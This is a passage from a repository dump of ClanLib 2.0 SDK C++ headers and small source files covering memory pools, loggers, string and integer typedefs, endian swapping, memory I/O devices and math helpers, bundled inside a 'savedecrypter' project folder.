software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Harry Storbacka 28 | */ 29 | 30 | /// \addtogroup clanCore_System clanCore System 31 | /// \{ 32 | 33 | 34 | #pragma once 35 | 36 | 37 | #include "static_memory_pool.h" 38 | 39 | /// \brief Memory pool using a fixed memory size. 40 | /// 41 | /// \xmlonly !group=Core/System! !header=core.h! \endxmlonly 42 | template 43 | class CL_FixedMemoryPool : public CL_StaticMemoryPool 44 | { 45 | /// \name Construction 46 | /// \{ 47 | 48 | public: 49 | /// \brief Constructs memory pool object. 50 | CL_FixedMemoryPool(CL_MemoryPool *alternative_pool = 0) 51 | : CL_StaticMemoryPool(pool_data, size, alternative_pool) 52 | { 53 | } 54 | 55 | 56 | /// \} 57 | /// \name Implementation 58 | /// \{ 59 | 60 | private: 61 | enum { size = s }; 62 | char pool_data[size]; 63 | /// \} 64 | }; 65 | 66 | 67 | /// \} 68 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/System/setup_core.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Harry Storbacka 28 | */ 29 | 30 | /// \addtogroup clanCore_System clanCore System 31 | /// \{ 32 | 33 | 34 | #pragma once 35 | 36 | 37 | #include "../api_core.h" 38 | 39 | /// \brief Library initializer class. 40 | /// 41 | /// \xmlonly !group=Core/System! !header=core.h! \endxmlonly 42 | class CL_API_CORE CL_SetupCore 43 | { 44 | /// \name Construction 45 | /// \{ 46 | 47 | public: 48 | /// \brief Initializes clanCore. 49 | CL_SetupCore(); 50 | 51 | ~CL_SetupCore(); 52 | 53 | 54 | /// \} 55 | /// \name Operations 56 | /// \{ 57 | 58 | public: 59 | 60 | /// \} 61 | /// \name Implementation 62 | /// \{ 63 | 64 | private: 65 | /// \} 66 | }; 67 | 68 | 69 | /// \} 70 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/System/static_memory_pool.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_System clanCore System 30 | /// \{ 31 | 32 | 33 | #pragma once 34 | 35 | 36 | #include "../api_core.h" 37 | #include "memory_pool.h" 38 | 39 | /// \brief Static memory pool. 40 | /// 41 | /// \xmlonly !group=Core/System! !header=core.h! !hide! \endxmlonly 42 | class CL_API_CORE CL_StaticMemoryPool : public CL_MemoryPool 43 | { 44 | /// \name Construction 45 | /// \{ 46 | 47 | public: 48 | CL_StaticMemoryPool( 49 | void *buffer, 50 | size_t size, 51 | CL_MemoryPool *alternative_pool = 0); 52 | 53 | ~CL_StaticMemoryPool(); 54 | 55 | 56 | /// \} 57 | /// \name Operations 58 | /// \{ 59 | 60 | public: 61 | void *alloc(size_t size); 62 | 63 | void free(void *data); 64 | 65 | 66 | /// \} 67 | /// \name Implementation 68 | /// \{ 69 | 70 | private: 71 | void *pool_buffer; 72 | 73 | size_t size; 74 | 75 | CL_MemoryPool *alternative_pool; 76 | 77 | size_t next; 78 | /// \} 79 | }; 80 | 81 | 82 | /// \} 83 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Text/console_logger.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_Text clanCore Text 30 | /// \{ 31 | 32 | #pragma once 33 | 34 | #include "../api_core.h" 35 | #include "logger.h" 36 | 37 | /// \brief Console logger. 38 | /// 39 | /// \xmlonly !group=Core/Text! !header=core.h! \endxmlonly 40 | class CL_API_CORE CL_ConsoleLogger : public CL_Logger 41 | { 42 | /// \name Construction 43 | /// \{ 44 | 45 | public: 46 | /// \brief Constructs a console logger. 47 | CL_ConsoleLogger(); 48 | 49 | ~CL_ConsoleLogger(); 50 | 51 | /// \} 52 | /// \name Attributes 53 | /// \{ 54 | 55 | public: 56 | 57 | /// \} 58 | /// \name Operations 59 | /// \{ 60 | 61 | public: 62 | /// \brief Log text to console. 63 | void log(const CL_StringRef &type, const CL_StringRef &text); 64 | 65 | /// \} 66 | /// \name Implementation 67 | /// \{ 68 | 69 | private: 70 | /// \} 71 | }; 72 | 73 | /// \} 74 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Text/file_logger.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_Text clanCore Text 30 | /// \{ 31 | 32 | #pragma once 33 | 34 | #include "../api_core.h" 35 | #include "logger.h" 36 | 37 | class CL_File; 38 | 39 | /// \brief File logger. 40 | /// 41 | /// \xmlonly !group=Core/Text! !header=core.h! \endxmlonly 42 | class CL_API_CORE CL_FileLogger : public CL_Logger 43 | { 44 | /// \name Construction 45 | /// \{ 46 | 47 | public: 48 | /// \brief Constructs a file logger. 49 | CL_FileLogger(const CL_StringRef &filename); 50 | 51 | ~CL_FileLogger(); 52 | 53 | /// \} 54 | /// \name Attributes 55 | /// \{ 56 | 57 | public: 58 | 59 | /// \} 60 | /// \name Operations 61 | /// \{ 62 | 63 | public: 64 | /// \brief Log text to file. 65 | void log(const CL_StringRef &type, const CL_StringRef &text); 66 | 67 | /// \} 68 | /// \name Implementation 69 | /// \{ 70 | 71 | private: 72 | CL_File *file; 73 | /// \} 74 | }; 75 | 76 | /// \} 77 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Text/string_types.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_Text clanCore Text 30 | /// \{ 31 | 32 | #pragma once 33 | 34 | #include 35 | #include "string_ref8.h" 36 | #include "string_ref16.h" 37 | #include "string8.h" 38 | #include "string16.h" 39 | 40 | typedef CL_StringRef8 CL_StringRef; 41 | typedef CL_String8 CL_String; 42 | 43 | /// \} 44 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/api_core.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/api_core.h -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/IOData/datatypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2009 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | /// \addtogroup clanCore_I_O_Data clanCore I/O Data 31 | /// \{ 32 | 33 | 34 | #pragma once 35 | 36 | 37 | #if _MSC_VER > 1000 38 | #pragma once 39 | #endif 40 | 41 | #if defined(WIN32) && (defined(__MINGW32__) == 0) 42 | typedef __int8 cl_int8; 43 | typedef unsigned __int8 cl_uint8; 44 | typedef __int16 cl_int16; 45 | typedef unsigned __int16 cl_uint16; 46 | typedef __int32 cl_int32; 47 | typedef unsigned __int32 cl_uint32; 48 | typedef __int64 cl_int64; 49 | typedef unsigned __int64 cl_uint64; 50 | #else 51 | typedef char cl_int8; 52 | typedef unsigned char cl_uint8; 53 | typedef short cl_int16; 54 | typedef unsigned short cl_uint16; 55 | typedef int cl_int32; 56 | typedef unsigned int cl_uint32; 57 | typedef long long cl_int64; 58 | typedef unsigned long long cl_uint64; 59 | #endif 60 | 61 | 62 | /// \} 63 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/IOData/endianess.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #include "Core/precomp.h" 31 | 32 | #include "API/Core/IOData/cl_endian.h" 33 | 34 | void CL_Endian::swap(void *data, int type_size, int total_times) 35 | { 36 | if (type_size == 1) return; 37 | 38 | unsigned char *d = (unsigned char *) data; 39 | 40 | for (int j=0; j 1000 37 | #pragma once 38 | #endif 39 | 40 | #include "../api_core.h" 41 | #include "iodevice.h" 42 | 43 | class CL_DataBuffer; 44 | 45 | /// \brief Memory I/O device. 46 | /// 47 | /// \xmlonly !group=Core/IO Data! !header=core.h! \endxmlonly 48 | class CL_API_CORE CL_IODevice_Memory : public CL_IODevice 49 | { 50 | /// \name Construction 51 | /// \{ 52 | 53 | public: 54 | /// \brief Constructs a memory I/O device. 55 | CL_IODevice_Memory(); 56 | 57 | CL_IODevice_Memory(CL_DataBuffer &data); 58 | 59 | 60 | /// \} 61 | /// \name Attributes 62 | /// \{ 63 | 64 | public: 65 | /// \brief Retrieves the data buffer for the memory device. 66 | const CL_DataBuffer &get_data() const; 67 | 68 | CL_DataBuffer &get_data(); 69 | 70 | 71 | /// \} 72 | /// \name Operations 73 | /// \{ 74 | 75 | public: 76 | 77 | 78 | /// \} 79 | /// \name Implementation 80 | /// \{ 81 | 82 | private: 83 | /// \} 84 | }; 85 | 86 | 87 | /// \} 88 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/IOData/iodevice_provider_memory.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | #include "API/Core/IOData/iodevice_provider.h" 32 | #include "API/Core/System/databuffer.h" 33 | 34 | class CL_IODeviceProvider_Memory : public CL_IODeviceProvider 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | CL_IODeviceProvider_Memory(); 41 | 42 | CL_IODeviceProvider_Memory(CL_DataBuffer &data); 43 | 44 | 45 | /// \} 46 | /// \name Attributes 47 | /// \{ 48 | 49 | public: 50 | virtual int get_size() const; 51 | 52 | virtual int get_position() const; 53 | 54 | const CL_DataBuffer &get_data() const; 55 | 56 | CL_DataBuffer &get_data(); 57 | 58 | 59 | /// \} 60 | /// \name Operations 61 | /// \{ 62 | 63 | public: 64 | virtual int send(const void *data, int len, bool send_all = true); 65 | 66 | virtual int receive(void *data, int len, bool receive_all = true); 67 | 68 | virtual int peek(void *data, int len); 69 | 70 | virtual bool seek(int position, CL_IODevice::SeekMode mode); 71 | 72 | CL_IODeviceProvider *duplicate(); 73 | 74 | 75 | /// \} 76 | /// \name Implementation 77 | /// \{ 78 | 79 | private: 80 | void validate_position() const; 81 | 82 | CL_DataBuffer data; 83 | 84 | mutable int position; 85 | /// \} 86 | }; 87 | 88 | 89 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/IOData/pipe_listen_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/System/event.h" 33 | class CL_PipeConnection; 34 | 35 | class CL_PipeListen_Impl 36 | { 37 | /// \name Construction 38 | /// \{ 39 | 40 | public: 41 | CL_PipeListen_Impl(const CL_String &name); 42 | 43 | ~CL_PipeListen_Impl(); 44 | 45 | 46 | /// \} 47 | /// \name Attributes 48 | /// \{ 49 | 50 | public: 51 | #ifdef WIN32 52 | HANDLE handle; 53 | 54 | CL_String name; 55 | #else 56 | int handle; 57 | #endif 58 | CL_Event accept_event; 59 | 60 | 61 | /// \} 62 | /// \name Operations 63 | /// \{ 64 | 65 | public: 66 | CL_Event begin_accept(); 67 | 68 | CL_PipeConnection complete_accept(); 69 | 70 | void cancel_accept(); 71 | 72 | CL_PipeConnection accept(); 73 | 74 | 75 | /// \} 76 | /// \name Implementation 77 | /// \{ 78 | 79 | private: 80 | #ifdef WIN32 81 | OVERLAPPED accept_overlapped; 82 | 83 | bool async_io; 84 | #endif 85 | /// \} 86 | }; 87 | 88 | 89 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/bezier_curve_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Harry Storbacka 27 | ** Magnus Norddahl 28 | */ 29 | 30 | #pragma once 31 | 32 | 33 | #include "Core/precomp.h" 34 | #include 35 | #include "API/Core/Math/point.h" 36 | 37 | class CL_BezierCurve_Impl 38 | { 39 | public: 40 | CL_BezierCurve_Impl(); 41 | ~CL_BezierCurve_Impl(); 42 | 43 | std::vector generate_curve_points(const CL_Angle &split_angle); 44 | std::vector subdivide_bezier(float start_pos, float end_pos) const; 45 | CL_Pointf get_point_relative(float) const; 46 | 47 | std::vector control_points; 48 | mutable std::vector P; 49 | 50 | float split_angle_rad; 51 | }; 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/line_ray.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Mark Page 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #include "Core/precomp.h" 31 | #include "API/Core/Math/vec3.h" 32 | #include "API/Core/Math/line_ray.h" 33 | #include "API/Core/Math/angle.h" 34 | 35 | // Explicit instantiate the versions we use: 36 | 37 | template class CL_LineRay2x; 38 | template class CL_LineRay2x; 39 | template class CL_LineRay2x; 40 | 41 | template class CL_LineRay3x; 42 | template class CL_LineRay3x; 43 | template class CL_LineRay3x; 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/origin.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #include "Core/precomp.h" 31 | 32 | #include "API/Core/Math/point.h" 33 | #include "API/Core/Math/size.h" 34 | 35 | // Explicit instantiate the versions we use: 36 | 37 | template class CL_Pointx; 38 | template class CL_Pointx; 39 | template class CL_Pointx; 40 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/rect_packer_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Kenneth Gangstoe 27 | */ 28 | 29 | #pragma once 30 | 31 | #include "API/Core/Math/rect_packer.h" 32 | 33 | class CL_RectPacker_Impl 34 | { 35 | public: 36 | class Node 37 | { 38 | public: 39 | Node(); 40 | Node(const CL_Rect &rect); 41 | ~Node(); 42 | 43 | int get_rect_count() const; 44 | 45 | Node *insert(const CL_Size &rect_size, int rect_id); 46 | 47 | void clear(); 48 | 49 | Node *child[2]; 50 | CL_Rect node_rect; 51 | 52 | int id; 53 | }; 54 | 55 | struct RootNode 56 | { 57 | public: 58 | int group_id; 59 | Node node; 60 | }; 61 | 62 | public: 63 | CL_RectPacker_Impl(const CL_Size &max_group_size); 64 | ~CL_RectPacker_Impl(); 65 | 66 | int get_total_rect_count() const; 67 | int get_rect_count(unsigned int group_index) const; 68 | 69 | CL_RectPacker::AllocatedRect add_new_node(const CL_Size &rect_size); 70 | RootNode *add_new_root(); 71 | 72 | std::vector root_nodes; 73 | RootNode *active_root_node; 74 | 75 | int next_node_id; 76 | 77 | CL_RectPacker::AllocationPolicy allocation_policy; 78 | 79 | CL_Size max_group_size; 80 | }; 81 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/sha1_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/IOData/datatypes.h" 33 | 34 | class CL_SHA1_Impl 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | CL_SHA1_Impl(); 41 | 42 | 43 | /// \} 44 | /// \name Attributes 45 | /// \{ 46 | 47 | public: 48 | CL_String8 get_hash(bool uppercase = false); 49 | 50 | void get_hash(unsigned char out_hash[20]); 51 | 52 | 53 | /// \} 54 | /// \name Operations 55 | /// \{ 56 | 57 | public: 58 | void reset(); 59 | 60 | void add(const void *data, int size); 61 | 62 | void calculate(); 63 | 64 | 65 | /// \} 66 | /// \name Implementation 67 | /// \{ 68 | 69 | private: 70 | void process_chunk(); 71 | 72 | void to_hex(char *buffer, cl_uint32 value, bool uppercase); 73 | 74 | unsigned int leftrotate_uint32(unsigned int value, int shift); 75 | 76 | cl_uint32 h0, h1, h2, h3, h4; 77 | 78 | unsigned char chunk[64]; 79 | 80 | int chunk_filled; 81 | 82 | cl_uint64 length_message; 83 | 84 | bool calculated; 85 | /// \} 86 | }; 87 | 88 | 89 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/triangle_math.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Harry Storbacka 27 | ** Mark Page 28 | */ 29 